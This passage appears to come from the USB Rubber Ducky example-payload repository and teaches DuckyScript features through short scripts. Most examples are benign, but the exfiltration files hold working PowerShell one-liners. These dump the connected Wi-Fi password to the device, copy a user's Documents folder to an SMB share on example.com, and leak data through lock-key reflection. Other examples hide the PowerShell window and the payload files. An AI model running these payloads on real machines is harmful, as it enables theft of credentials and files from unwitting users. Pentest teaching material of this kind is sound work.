1)\n\tEND_IF\nEND_FUNCTION\n\nBUTTON_DEF\n\tENTER\n\tSTRING SELECTION MADE\n\tENTER\n\t$MODE_SELECTED = TRUE\nEND_BUTTON\n\nFUNCTION draw_menu()\n\tENTER\n\tSTRINGLN Menu\n\tSTRING [\n\tIF ($SELECTED == MODE_1) THEN\n\t\tSTRING *\n\tEND_IF\n\tSTRINGLN ] PAYLOAD 1\n\tSTRING [\n\tIF ($SELECTED == MODE_2) THEN\n\t\tSTRING *\n\tEND_IF\n\tSTRINGLN ] PAYLOAD 2\n\tSTRING [\n\tIF ($SELECTED == MODE_3) THEN\n\t\tSTRING *\n\tEND_IF\n\tSTRINGLN ] PAYLOAD 3\nEND_FUNCTION\n\nFUNCTION run_menu()\n\tVAR $MODE_SELECTED = FALSE\n\tVAR $NUMSTATE = $_NUMLOCK_ON\n\tdraw_menu()\n\tWHILE ($MODE_SELECTED == FALSE) \n\t\tIF ($NUMSTATE != $_NUMLOCK_ON) THEN\n\t\t\t$NUMSTATE = $_NUMLOCK_ON\n\t\t\tinc_mode()\n\t\t\tdraw_menu()\n\t\tEND_IF\n\t\tDELAY 200\n\tEND_WHILE\n\tDELAY 1000\n\t$_BUTTON_USER_DEFINED = FALSE\n\tIF ($SELECTED == MODE_1) THEN\n\t\tSTRINGLN PAYLOAD 1\n\tELSE IF ($SELECTED == MODE_2) THEN\n\t\tSTRINGLN PAYLOAD 2\n\tELSE IF ($SELECTED == MODE_3) THEN\n\t\tSTRINGLN PAYLOAD 3\n\tEND_IF\nEND_FUNCTION\n\nSTRING PRESS NUMLOCK to change selection\nENTER\nSTRING PRESS BUTTON to confirm selection\nENTER\nrun_menu()\n\n\nREM PAYLOADS/MODES\nIF ($SELECTED == MODE_1) THEN\n REM PLACE PAYLOAD 1 HERE\n\tSTRING Hello Payload 1!\nELSE IF ($SELECTED == MODE_2) THEN\n REM PLACE PAYLOAD 2 HERE\n\tSTRING Hello Payload 2!\nELSE IF ($SELECTED == MODE_3) THEN\n REM PLACE PAYLOAD 3 HERE\n\tSTRING Hello Payload 3!\nEND_IF\n\n" }, { "path": "payloads/examples/Exfiltration/Exfiltration-example1.txt", "content": "REM Example Simple USB Exfiltration Technique for Windows\nATTACKMODE HID STORAGE\nDELAY 2000\nGUI r\nDELAY 100\nSTRING powershell \"$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>>$m':\\'$env:computername'.txt'\"\nENTER\n\n\nREM This short Powershell one-liner executes from the Windows Run dialog.\nREM The drive letter of the volume with the label “DUCKY” is saved as $m.\nREM The netsh command will get the network name and passphrase for the currently connected network ((Get-NetConnectionProfile).Name).\nREM The results of the netsh command (filtered for only SSID and key) will be redirected (saved) to a file on the root of the “DUCKY” drive, saved as the computer name (in .txt format).\n" }, { "path": "payloads/examples/Exfiltration/Exfiltration-example2.txt", "content": "REM Example Simple SMB Exfiltration Method for Windows\nATTACKMODE HID\nDELAY 2000\nDEFINE SMB_SERVER example.com\nDEFINE SMB_SHARE sharedfolder\nGUI r\nDELAY 100\nSTRING powershell \"cp -r $env:USERPROFILE\\Documents\\* \\\\\nSTRING SMB_SERVER\nSTRING \\\nSTRING SMB_SHARE\nSTRING \"\nENTER\n\n \nREM This short Powershell one-liner, executed from the Windows Run dialog, will copy all documents (including subfolders) from the currently logged in user account’s documents folder to the defined SMB share.\n" }, { "path": "payloads/examples/Exfiltration/Exfiltration-example3.txt", "content": "REM Example Simple Keystroke Reflection Attack for Windows\rREM Saves currently connected wireless LAN profile to DUCKY\rATTACKMODE HID\rLED_OFF\rDELAY 2000\rSAVE_HOST_KEYBOARD_LOCK_STATE\r$_EXFIL_MODE_ENABLED = TRUE\r$_EXFIL_LEDS_ENABLED = TRUE\r\rREM Store the currently connected WiFi SSID & Key to %tmp%\\z\rGUI r\rDELAY 100\rSTRINGLN powershell \"netsh wlan show profile name=(Get-NetConnectionProfile).Name key=clear|?{$_-match'SSID n|Key C'}|%{($_ -split':')[1]}>$env:tmp\\z\"\rDELAY 100\r\rREM Convert the stored creds into CAPSLOCK and NUMLOCK values.\rGUI r\rDELAY 100\rSTRINGLN powershell \"foreach($b in $(cat $env:tmp\\z -En by)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){if($b-band$a){$o+='%{NUMLOCK}'}else{$o+='%{CAPSLOCK}'}}}; $o+='%{SCROLLLOCK}';echo $o >$env:tmp\\z\"\rDELAY 100\r\rREM Reflect the CAPSLOCK and NUMLOCK Keystrokes back to the Ducky.\rGUI r\rDELAY 100\rSTRINGLN powershell \"$o=(cat $env:tmp\\z);Add-Type -A System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait($o);rm $env:tmp\\z\"\rDELAY 100\r\rREM The final SCROLLLOCK keystroke indicates EXFIL is complete.\rWAIT_FOR_SCROLL_CHANGE\rLED_G\r$_EXFIL_MODE_ENABLED = FALSE\rRESTORE_HOST_KEYBOARD_LOCK_STATE\n\n\n\n\nREM Per the initial ATTACKMODE command. the USB Rubber Ducky will act as a HID keyboard.\n\rREM SAVE_HOST_KEYBOARD_LOCK_STATE will save the state of the lock key LEDs, as reported by the target, so that they may be restored to their original configuration after the Keystroke Reflection attack is performed.\n\rREM $_EXFIL_MODE_ENABLED = TRUE will instruct the USB Rubber Ducky to listen for control codes on the USB HID OUT endpoint, saving each change as a bit within loot.bin.\n\rREM $_EXFIL_LEDS_ENABLED = TRUE will show flash the USB Rubber Ducky LED as loot is saved, useful when debugging. Set as FALSE for a more stealthy operation, however the flash drive case should sufficiently conceal the LED.\n\rREM The first powershell one-liner, injected into the run dialog, will save the currently connected WiFi network name (SSID) and plaintext passphrase to a temporary file. The file, known as the \"loot\", is saved as \"z\" within %TEMP% ($env:tmp\\z) directory, encoded in standard ASCII.\n\rREM The second powershell one-liner will convert the temporary ASCII loot file, bit by bit, into a set of caps lock and num lock key values. It will conclude this file with a final scroll lock value.\n\rREM The third and final powershell one-liner, in software, will \"press\" the lock keys indicated by the temporary file via the SendKeys .NET class. The effect of this will be the binary values of the converted loot sent to the USB Rubber Ducky, one bit at a time, via the USB HID OUT endpoint.\n\rREM Additionally, the temporary file will then be removed. The pentester may consider including additional techniques for obfuscation, optimization and reducing the forensic footprint.\n\rREM WAIT_FOR_SCROLL_CHANGE will get triggered when the final key \"press\" from the SendKeys class is executed, thereby continuing the payload.\n\rREM Finally $_EXFIL_MODE_ENABLED = FALSE will instruct the USB Rubber Ducky to conclude saving the received control codes in loot.bin and RESTORE_HOST_KEYBOARD_LOCK_STATE will restore the lock key LEDs to their original state before the exfiltration began." }, { "path": "payloads/examples/Exfiltration/Exfiltration-example4.txt", "content": "REM Example variable exfiltration\r\rVAR $FOO = 1337\rEXFIL $FOO\r\r\rREM The binary contents of the variable $FOO will be written (appended) to the loot.bin file on the root of the USB Rubber Ducky MicroSD card.\r\r" }, { "path": "payloads/examples/Functions/Functions-example1.txt", "content": "REM Example Function\nVAR $TIMER = 3\nFUNCTION COUNTDOWN()\n WHILE ($TIMER > 0)\n STRING .\n $TIMER = ($TIMER - 1)\n DELAY 500\n END_WHILE\nEND_FUNCTION\n\nSTRING And then it happened\nCOUNTDOWN()\n\nSPACE\nSTRING a door opened to a world\n$TIMER = 5\nCOUNTDOWN()\n\nREM The FUNCTION command defines a new function named COUNTDOWN() containing a code block with a WHILE loop which types a single period (\".\") for each value of $TIMER.\nREM The first time the COUNTDOWN() function is called, the $TIMER variable holds the value 3. The second time it is called, the $TIMER variable holds the value 5.\nREM The string \"And then it happened... a door opened to a world.....\" will be typed.\n" }, { "path": "payloads/examples/Functions/Functions-example2.txt", "content": "REM Example FUNCTION with RETURN\nATTACKMODE HID\nDELAY 2000\n\nBUTTON_DEF\n STRING !\nEND_BUTTON\n\nFUNCTION TEST_BUTTON()\n STRING Press the button within the next 5 seconds.\n VAR $TIMER = 5\n WHILE ($TIMER > 0)\n STRING .\n DELAY 1000\n $TIMER = ($TIMER - 1)\n END_WHILE\n ENTER\n IF ($_BUTTON_PUSH_RECEIVED == TRUE) THEN\n RETURN TRUE\n ELSE IF ($_BUTTON_PUSH_RECEIVED == FALSE) THEN\n RETURN FALSE\n END_IF\nEND_FUNCTION\n\nIF (TEST_BUTTON() == TRUE) THEN\n STRINGLN The button was pressed!\nELSE\n STRINGLN The button was not pressed!\nEND_IF\n\nREM When the IF statement on line 26 checks the condition of the function TEST_BUTTON, the function is called and executed.\nREM Based on whether or not the button is pressed, the RETURN value (lines 19 and 21) will be set to TRUE or FALSE.\nREM The IF statement on line 26 evaluates the RETURN of the function TEST_BUTTON and types the result accordingly.\n" }, { "path": "payloads/examples/Holding Keys/Holding-Keys-example1.txt", "content": "REM Example HOLD and RELEASE\rREM Target: Windows\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rREM Open Powershell\rGUI r\rDELAY 1000\rSTRING powershell\rENTER\r\rREM Hide Powershell Window\rDELAY 2000\rALT SPACE\rDELAY 100\rm\rDELAY 100\rHOLD DOWNARROW\rDELAY 3000\rRELEASE DOWNARROW\rENTER\r\rREM Run desired commands in obfuscated powershell window\rSTRING tree c:\\\rENTER\n\nREM This example payload targets Windows systems.\nREM Using the GUI r key combo to open the Run dialog, a powershell window will be opened.\nREM The ALT SPACE key combo opens the window menu of the currently active window (in this case, the powershell window), followed by the m key to select the Move command.\nREM The DOWNARROW is held for 3 seconds, as specified by the DELAY 3000 command, before being released — thus hiding the contents of the powershell window below the screen.\nREM The benign tree c:\\ command is run, producing a graphical directory structure of the disk." }, { "path": "payloads/examples/Holding Keys/Holding-Keys-example2.txt", "content": "REM Example modifier key hold\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rINJECT_MOD\rHOLD CONTROL\rDELAY 4000\rRELEASE CONTROL\r\r\rREM The CONTROL key will be held for 4 seconds." }, { "path": "payloads/examples/Holding Keys/Holding-Keys-example3.txt", "content": "REM Example holding multiple keys\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rSTRING iddqd\rDELAY 500\r\rWHILE TRUE\r STRING idkfa\r DELAY 500\r HOLD LEFTARROW\r HOLD UPARROW\r INJECT_MOD\r HOLD CONTROL\r DELAY 5000\r INJECT_MOD\r RELEASE CONTROL\r RELEASE UPARROW\r RELEASE LEFTARROW\r DELAY 500\rEND_WHILE\r\r\rREM Answering the age old question, \"will it run doom?\", this payload proves the 1993 classic first-person shooter no match for the USB Rubber Ducky.\rREM More specifically, this payload will cause Doom Guy to walk in circles firing his weapon." }, { "path": "payloads/examples/Jitter/Jitter-example1.txt", "content": "REM Example Jitter\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\r$_JITTER_ENABLED = TRUE\rWHILE TRUE\r STRINGLN The quick brown fox jumps over the lazy dog\rEND_WHILE\n\n\nREM The test string is typed continuously with a modulated delay between each key press." }, { "path": "payloads/examples/Jitter/Jitter-example2.txt", "content": "REM Example Jitter with increasing $_JITTER_MAX\rATTACKMODE HID STORAGE\rDELAY 2000\r\r$_JITTER_ENABLED = TRUE\rWHILE TRUE\r STRINGLN The quick brown fox jumps over the lazy dog\r $_JITTER_MAX = ($_JITTER_MAX * 2)\rEND_WHILE\r\r\rREM With each iteration of typing the test string the jitter limit is doubled, yielding slower and more sporadic typing." }, { "path": "payloads/examples/LED/LED-example1.txt", "content": "REM The LED_R command will enable the red LED.\r\rREM To show only a red LED disable any default LED behavior (such as storage or payload processing) by executing LED_OFF before LED_R.\n\nATTACKMODE HID STORAGE\rWHILE TRUE\r IF ($_CAPSLOCK_ON == TRUE) THEN\r LED_OFF\r LED_R\r ELSE IF ($_CAPSLOCK_ON == FALSE) THEN\r LED_OFF\r END_IF\rEND_WHILE\r\rREM The LED will turn solid red while caps lock is on." }, { "path": "payloads/examples/LED/LED-example2.txt", "content": "REM The LED_G command will enable the green LED.\r\rATTACKMODE HID STORAGE\rBUTTON_DEF\r LED_OFF\r STOP_PAYLOAD\rEND_BUTTON\rWHILE TRUE\r LED_OFF\r LED_G\r DELAY 1000\r LED_OFF\r LED_R\r DELAY 1000\rEND_WHILE\r\rREM The LED will alternate between solid red and solid green at one second intervals.\rREM Pressing the button will turn the LED off and stop the payload." }, { "path": "payloads/examples/LED/LED-example3.txt", "content": "ATTACKMODE HID STORAGE\rWHILE TRUE\r LED_R\r WAIT_FOR_BUTTON_PRESS\r LED_G\r WAIT_FOR_BUTTON_PRESS\rEND_WHILE\r\r\rREM The LED will alternate between red and green on each button press." }, { "path": "payloads/examples/Lock Keys/Lock-Keys-example1.txt", "content": "ATTACKMODE HID STORAGE\rLED_OFF\rDELAY 2000\rWHILE TRUE\r LED_R\r WAIT_FOR_CAPS_CHANGE\r LED_G\r WAIT_FOR_CAPS_CHANGE\rEND_WHILE\r\r\rREM Pressing the caps lock key on the target will cycle the USB Rubber Ducky LED between red and green.\r" }, { "path": "payloads/examples/Lock Keys/Lock-Keys-example2.txt", "content": "REM Example SAVE and RESTORE of of the Keyboard Lock State\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rSAVE_HOST_KEYBOARD_LOCK_STATE\r\r$_RANDOM_MIN = 1\r$_RANDOM_MAX = 3\rVAR $TIMER = 120\r\rWHILE ($TIMER > 0)\r VAR $A = $_RANDOM_INT\r IF ($A == 1) THEN\r CAPSLOCK\r ELSE IF ($A == 2) THEN\r NUMLOCK\r ELSE IF ($A == 3) THEN\r SCROLLLOCK\r END_IF\r DELAY 50\r $TIMER = ($TIMER - 1)\rEND_WHILE\r\rRESTORE_HOST_KEYBOARD_LOCK_STATE\r\r\r\rREM At the beginning of the payload, the currently reported keyboard lock state are saved.\rREM For about 6 seconds, as a while loop iterates 120 times with a 50 ms delay, the caps, num or scroll lock keys will be randomly pressed.\rREM When the \"keyboard fireworks\" display has concluded, the previously saved keyboard lock state will be restored.\rREM Meaning, if the target has caps lock off, scroll lock off, and num lock on before the payload began, so too would it after its conclusion. \r" }, { "path": "payloads/examples/Lock Keys/Lock-Keys-example3.txt", "content": "REM Example Blink green if LED states are reported, \rREM otherwise blink red.\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rFUNCTION BLINK_RED()\r\tWHILE TRUE\r\t\tLED_OFF\r\t\tDELAY 50\r\t\tLED_R\r\t\tDELAY 50\r\tEND_WHILE\rEND_FUNCTION\r\rFUNCTION BLINK_GREEN()\r\tWHILE TRUE\r\t\tLED_OFF\r\t\tDELAY 50\r\t\tLED_G\r\t\tDELAY 50\r\tEND_WHILE\rEND_FUNCTION\r\rIF ($_RECEIVED_HOST_LOCK_LED_REPLY == TRUE) THEN\r\tBLINK_GREEN()\rELSE IF ($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) THEN\r\tBLINK_RED()\rEND_IF\r\r\rREM The USB Rubber Ducky will blink green if the LED states are reported by the target. Otherwise, the LED will blink red." }, { "path": "payloads/examples/Lock Keys/Lock-Keys-example4.txt", "content": "REM Example ONLY CAPS FOR YOU (Evil Prank)\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rWHILE TRUE\r IF ($_CAPSLOCK_ON == FALSE) THEN\r CAPSLOCK\r END_IF\r DELAY 100\rEND_WHILE\r\r\rREM If caps lock is turned off by the user, it will be turned on by the USB Rubber Ducky.\nREM @Hak5Darren loves this prank." }, { "path": "payloads/examples/Loops/Loops-example1.txt", "content": "REM Example while loop - blink LED 42 times\r\rVAR $FOO = 42\rWHILE ( $FOO > 0 )\r LED_G\r DELAY 500\r LED_OFF\r DELAY 500\r $FOO = ( $FOO - 1 )\rEND_WHILE\r\rLED_R\n\n\nREM The variable $FOO is set to 42.\rREM The WHILE loop begins, evaluating the condition \"is $FOO greater than 0\".\rREM Every time the condition is TRUE, the block of code between WHILE and END_WHILE will run.\rREM The LED will blink green: half a second on, half a second off.\rREM The variable $FOO will decrement by one.\rREM Once $FOO reaches zero, the WHILE condition will no longer evaluate to TRUE. The payload will continue execution after the END_WHILE statement, where the LED will light red.\rREM If the button is pressed at any time during the payload execution, the WHILE loop will end and the USB Rubber Ducky will enter ATTACKMODE STORAGE since that is the default behavior when no BUTTON_DEF has been initiated." }, { "path": "payloads/examples/Loops/Loops-example2.txt", "content": "REM Example while loop - press the button 5 times\r\rVAR $FOO = 5\r\rWHILE ( $FOO > 0 )\r STRINGLN Press the button...\r WAIT_FOR_BUTTON_PRESS\r $FOO = ( $FOO - 1 )\rEND_WHILE\r\rSTRINGLN You pressed the button 5 times!\r\r\rREM The variable $FOO is set to 5.\rREM The code block within the WHILE loop will be repeated until the expression evaluates to FALSE.\rREM For each run of the code block, the message \"Press the button...\" is typed. The payload then waits until it detects the button is pressed, at which point the variable $FOO is decremented." }, { "path": "payloads/examples/Loops/Loops-example3.txt", "content": "REM Example Infinite Loop\rBUTTON_DEF\r WHILE TRUE\r LED_R\r DELAY 500\r LED_OFF\r DELAY 500\r END_WHILE\rEND_BUTTON\rWHILE TRUE\r LED_G\r DELAY 500\r LED_OFF\r DELAY 500\rEND_WHILE\r\r\rREM Because a button definition has been initiated with BUTTON_DEF, the default behavior will no longer apply when the button is pressed.\rREM The LED will blink green: half a second on, half a second off.\rREM Pressing the button will stop the currently infinite loop of blinking the LED green and execute the button definition, thus blinking the LED red." }, { "path": "payloads/examples/Operators/Operators-example1.txt", "content": "REM Assign $FOO to 42\rVAR $FOO = 42\r\rREM The variable is now 42. \rREM Let’s add it by 1.\r$FOO = ( $FOO + 1 )\r\rREM The variable is now 43: the sum of 42 and 1. \rREM Let’s subtract it by 1.\r$FOO = ( $FOO - 1 )\r\rREM The variable is now 42 (again): \rREM the difference of 42 and 1. \rREM Let’s multiply it by 2.\r$FOO = ( $FOO * 2 )\r\rREM The variable is now 84: \rREM the product of 42 and 2.\rREM Let’s divide it by 2.\r$FOO = ( $FOO / 2 )\r\rREM The variable is now 42 (again): \rREM the quotient of 82 and 2.\rREM Let’s modulus it by 4.\r$FOO = ( $FOO % 4 )\r\rREM The variable is now 2: \rREM the signed remainder of 42 and 4.\rREM Let’s raise it to the power of 6.\r$FOO = ( $FOO ^ 6 )\r\rREM Our variable is now 64: \rREM the exponent of 2 and 6.\r" }, { "path": "payloads/examples/Operators/Operators-example2.txt", "content": "REM The order of operations (order precedence) are a set of rules that define which procedures are performed first in order to evaluate an expression, similar to that of mathematics.\rREM In DuckyScript, parenthesis ( ) are required to define the precedence conventions. \r\r\rVAR $FOO = ( 4 * 10 ) + 2\r\rREM The expression ( 4 * 10 ) evalues to 40. \rREM The expression 40 + 2 evalues to 42.\r\r\rREM If multiple pairs of parentheses are required, the parentheses can be nested. \r\r\rVAR $FOO = 42\rVAR $BAR = (( 100 * 13 ) + ( $FOO - 5 ))\r\rREM The expression 42 - 5 evalues to 37\rREM The expression ( 100 * 13 ) evalues to 1300\rREM The expression 1300 + 37 evalues to 1337" }, { "path": "payloads/examples/Operators/Operators-example3.txt", "content": "REM Bitwise operators are operators which operate on the uint16 values at the binary level.\r\rATTACKMODE HID STORAGE VID_05AC PID_021E\rVAR $FOO = $_CURRENT_VID\rREM Because VID/PID parameters are little endian, \r$FOO = ((($FOO >> 8) & 0x00FF) | (($FOO << 8) & 0xFF00))\rREM $FOO will now equal 0xAC05\r\rREM The value of $_CURRENT_VID is saved into the variable $FOO as AC05.\rREM Using bitwise operators its endianness is swapped to 05AC." }, { "path": "payloads/examples/Payload Control/Payload-Control-example1.txt", "content": "REM Example RESTART_PAYLOAD\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rSTRINGLN Hello, World!\rRESTART_PAYLOAD\r\rSTRINGLN Nothing to see here.\r\r\rREM The payload loop typing the \"Hello, World!\" line infinitely.\rREM The \"Nothing to see here.\" string will never be typed.\r" }, { "path": "payloads/examples/Payload Control/Payload-Control-example2.txt", "content": "REM Example STOP_PAYLOAD\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rBUTTON_DEF\r STOP_PAYLOAD\rEND_BUTTON\r\rWHILE TRUE\r RANDOM_CHARACTER\rEND_WHILE\r\r\rREM The payload will continuously type a random character.\rREM Pressing the button will stop the payload.\r" }, { "path": "payloads/examples/Payload Control/Payload-Control-example3.txt", "content": "REM Example RESET\r\rATTACKMODE HID STORAGE\rDELAY 2000\r\rINJECT_MOD\rHOLD SHIFT\rHOLD a\rDELAY 700\rRELEASE a\rRESET\r\rDELAY 1000\rSTRING nd reset\r\r\rREM On a Windows or Linux target, the payload may result in AAAAAAAAAAAAnd reset\rREM Notice that a RELEASE SHIFT command was omitted, and yet the nd reset string is lowercase. This is because the RESET command released all keys." }, { "path": "payloads/examples/Payload Hiding/Payload-Hiding-example1.txt", "content": "ATTACKMODE OFF\r\rBUTTON_DEF\r ATTACKMODE OFF\r RESTORE_PAYLOAD\r ATTACKMODE STORAGE\rEND_BUTTON\r\rHIDE_PAYLOAD\rATTACKMODE HID STORAGE\rDELAY 2000\rSTRING Nothing to see here...\r\r\rREM Upon first enumeration, the attached computer will not be able to see the inject.bin or seed.bin files on the USB Rubber Ducky storage.\rREM Pressing the button will re-enumerate the USB Rubber Ducky storage with both files visible once more.\r" }, { "path": "payloads/examples/Randomization/Randomization-example1.txt", "content": "REM Example Random Keys\rATTACKMODE HID STORAGE\rDELAY 2000\r\rBUTTON_DEF\r RANDOM_CHARACTER\rEND_BUTTON\r\rSTRINGLN Here are 10 random lowercase letters:\rVAR $TIMES = 10\rWHILE ($TIMES > 0)\r RANDOM_LOWERCASE_LETTER\r $TIMES = ($TIMES - 1)\rEND_WHILE\rENTER\rENTER\rSTRINGLN Here are 20 random numbers:\rVAR $TIMES = 20\rWHILE ($TIMES > 0)\r RANDOM_NUMBER\r $TIMES = ($TIMES - 1)\rEND_WHILE\rENTER\rENTER\rSTRINGLN Here are 3 random special characters:\rRANDOM_SPECIAL\rRANDOM_SPECIAL\rRANDOM_SPECIAL\rSTRINGLN Press the button for a random character:\n\n\n\nREM This payload will type:\rREM 10 random lowercase letters, per the while loop.\rREM 20 random numbers, per the while loop.\rREM 3 random special characters.\nREM The payload will then instruct the user to press the button.\rREM On each press of the button, the BUTTON_DEF will execute. \rREM This special functions contains the RANDOM_CHARACTER command, and thus a random character will be typed." }, { "path": "payloads/examples/Randomization/Randomization-example2.txt", "content": "REM Example Random Integer\nATTACKMODE HID STORAGE\n\nLED_OFF\nVAR $A = $_RANDOM_INT\nWHILE ($A > 0)\n LED_G\n DELAY 500\n LED_OFF\n DELAY 500\n $A = ($A - 1)\nEND_WHILE\n\n\nREM Each time this payload is executed, the LED will randomly blink between 1 and 9 times.\n" }, { "path": "payloads/examples/Randomization/Randomization-example3.txt", "content": "REM Example Random Integer Example with Range\n\nATTACKMODE HID STORAGE\nLED_OFF\n\n$_RANDOM_MIN = 20\n$_RANDOM_MAX = 50\n\nVAR $A = $_RANDOM_INT\nWHILE ($A > 0)\n LED_G\n DELAY 500\n LED_OFF\n DELAY 500\n $A = ($A - 1)\nEND_WHILE\n\nREM Each time this payload is executed, the LED will blink a random number of times between 20 and 50.\n" }, { "path": "payloads/examples/Randomization/Randomization-example4.txt", "content": "REM !!!! Use caution with random VID and PID values as unexpected results are likely !!!!\n\nATTACKMODE OFF\rWHILE TRUE\r ATTACKMODE HID VID_RANDOM PID_RANDOM MAN_RANDOM PROD_RANDOM SERIAL_RANDOM\r LED_R\r DELAY 2000\r STRINGLN Hello, World!\r WAIT_FOR_BUTTON_PRESS\r LED_G\rEND_WHILE\n\nREM On each press of the button, the USB Rubber Ducky will re-enumerate as a new USB HID device with a random VID, PID, MAN, PROD and SERIAL.\rREM The string Hello, World! may be typed.\rREM Because VID and PID values may dictate device driver initialization, the USB Rubber Ducky may not be correctly enumerated as a Human Interface Device by the target OS.\n" }, { "path": "payloads/examples/Storage Activity/Storage-Activity-example1.txt", "content": "REM !!!! Results may vary greatly depending on target OS. Some operating systems may keep storage active for an exceptionally long time. You may need to experiment with this feature to achieve the desired results for your given target. !!!!\n\r\rREM Example WAIT_FOR_STORAGE_ACTIVITY Payload\r\rATTACKMODE HID STORAGE\rDELAY 2000\rLED_OFF\rSTRINGLN Waiting for the disk to be read from or written to...\r$_STORAGE_ACTIVITY_TIMEOUT = 10000\rWAIT_FOR_STORAGE_ACTIVITY\rLED_OFF\rLED_R\r\r\rREM The WAIT_FOR_STORAGE_ACTIVITY command blocks all further payload execution until activity on the USB Rubber Ducky storage has been detected.\rREM The LED will light red after storage activity has been detected." }, { "path": "payloads/examples/Storage Activity/Storage-Activity-example2.txt", "content": "REM !!!! Results may vary greatly depending on target OS. Some operating systems may keep storage active for an exceptionally long time. You may need to experiment with this feature to achieve the desired results for your given target. !!!!\n\r\rREM Example WAIT_FOR_STORAGE_INACTIVITY Payload\r\rATTACKMODE HID STORAGE\rDELAY 2000\rLED_OFF\r\rGUI r\rDELAY 100\rSTRINGLN powershell \"$m=(Get-Volume -FileSystemLabel 'DUCKY').DriveLetter;echo $env:computername >> $m:\\computer_names.txt\" \r\r$_STORAGE_ACTIVITY_TIMEOUT = 10000\rWAIT_FOR_STORAGE_INACTIVITY\rLED_OFF\rLED_R\r\rREM The LED will light red when the storage device becomes inactive." }, { "path": "payloads/examples/Tests/test-suite.txt", "content": "VAR $PASS = 0\nVAR $FAILED = 0\n\nVAR $TOGGLE = 0\nVAR $CD = 3\n\nFUNCTION PASSED()\n\tSTRINGLN P\n\t$PASS = ($PASS + 1)\nEND_FUNCTION\n\nFUNCTION FAIL()\n\tSTRINGLN F\n\tLED_R\n\t$FAILED = ($FAILED + 1)\nEND_FUNCTION\n\nEXTENSION TRANSLATE()\n\tREM DEFINE STRICT_TRUTH FALSE\n\tDEFINE PRINT_INT 0\n\tDEFINE PRINT_HEX 1\n\tVAR $DIGIT_PRINT_MODE = PRINT_INT\n\tVAR $D = 0\n\tVAR $IN = 0\n\tVAR $INPUT = 0\n\tVAR $MOD = 0\n\tVAR $P = FALSE\n\tVAR $NL = TRUE\n\tFUNCTION PRINTDIGIT()\n\t\tIF ($D == 0) THEN\n\t\t\tSTRING 0\n\t\tELSE IF ($D == 1) THEN\n\t\t\tSTRING 1\n\t\tELSE IF ($D == 2) THEN\n\t\t\tSTRING 2\n\t\tELSE IF ($D == 3) THEN\n\t\t\tSTRING 3\n\t\tELSE IF ($D == 4) THEN\n\t\t\tSTRING 4\n\t\tELSE IF ($D == 5) THEN\n\t\t\tSTRING 5\n\t\tELSE IF ($D == 6) THEN\n\t\t\tSTRING 6\n\t\tELSE IF ($D == 7) THEN\n\t\t\tSTRING 7\n\t\tELSE IF ($D == 8) THEN\n\t\t\tSTRING 8\n\t\tELSE IF ($D == 9) THEN\n\t\t\tSTRING 9\n\t\tELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN \n\t\t\tIF ($D == 10) THEN\n\t\t\t\tSTRING A\n\t\t\tELSE IF ($D == 11) THEN\n\t\t\t\tSTRING B\n\t\t\tELSE IF ($D == 12) THEN\n\t\t\t\tSTRING C\n\t\t\tELSE IF ($D == 13) THEN\n\t\t\t\tSTRING D\n\t\t\tELSE IF ($D == 14) THEN\n\t\t\t\tSTRING E\n\t\t\tELSE IF ($D == 15) THEN\n\t\t\t\tSTRING F\n\t\t\tEND_IF\n\t\tELSE \n\t\t\tSTRING ?\n\t\tEND_IF\n\tEND_FUNCTION\n\tFUNCTION CONSUME()\n\t\t$D = 0\n\t\tWHILE ($INPUT >= $MOD)\n\t\t\t$D = ($D + 1)\n\t\t\t$INPUT = ($INPUT - $MOD)\n\t\tEND_WHILE\n\t\tIF (($D > 0) || ($P == TRUE)) THEN\n\t\t\t$P = TRUE\n\t\t\tPRINTDIGIT()\n\t\tEND_IF\n\tEND_FUNCTION\n\tFUNCTION SWAP_ENDIAN()\n\t\t$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))\n\tEND_FUNCTION\n\tFUNCTION TRANSLATE_INT() \n\t\t$DIGIT_PRINT_MODE = PRINT_INT\n\t\t$P = FALSE\n\t\tIF ( $INPUT >= 10000) THEN\n\t\t\t$MOD = 10000\n\t\t\tCONSUME()\n\t\tEND_IF\n\t\tIF (($INPUT >= 1000) || ($P == TRUE)) THEN\n\t\t\t$MOD = 1000\n\t\t\tCONSUME()\n\t\tEND_IF\n\t\tIF (($INPUT >= 100) || ($P == TRUE)) THEN\n\t\t\t$MOD = 100\n\t\t\tCONSUME()\n\t\tEND_IF\n\t\tIF (($INPUT >= 10) || ($P == TRUE)) THEN\n\t\t\t$MOD = 10\n\t\t\tCONSUME()\n\t\tEND_IF()\n\t\t$D = $INPUT\n\t\tPRINTDIGIT()\n\t\tIF $NL THEN\n\t\t\tENTER\n\t\tEND_IF\n\tEND_FUNCTION\n\tFUNCTION TRANSLATE_BOOL()\n\t\tREM IF STRICT_TRUTH THEN\n\t\tREM\tIF ($INPUT == TRUE) THEN\n\t\tREM\t\tSTRING TRUE\n\t\tREM\tELSE IF ($INPUT == FALSE) THEN\n\t\tREM\t\tSTRING FALSE\n\t\tREM\tELSE \n\t\tREM\t\tSTRING ?\n\t\tREM\tEND_IF\n\t\tREM ELSE\n\t\t\tIF $INPUT THEN\n\t\t\t\tSTRING TRUE\n\t\t\tELSE\n\t\t\t\tSTRING FALSE\n\t\t\tEND_IF\n\t\tREM END_IF\n\t\tIF $NL THEN\n\t\t\tENTER\n\t\tEND_IF\n\tEND_FUNCTION\n\tFUNCTION TRANSLATE_HEX()\n\t\t$DIGIT_PRINT_MODE = PRINT_HEX\n\t\tVAR $chars = 0\n\t\tVAR $d1 = 0\n\t\tVAR $d2 = 0\n\t\tVAR $d3 = 0\n\t\tVAR $d4 = 0\n\t\tWHILE ($INPUT > 0)\n\t\t\tIF ($chars == 0) 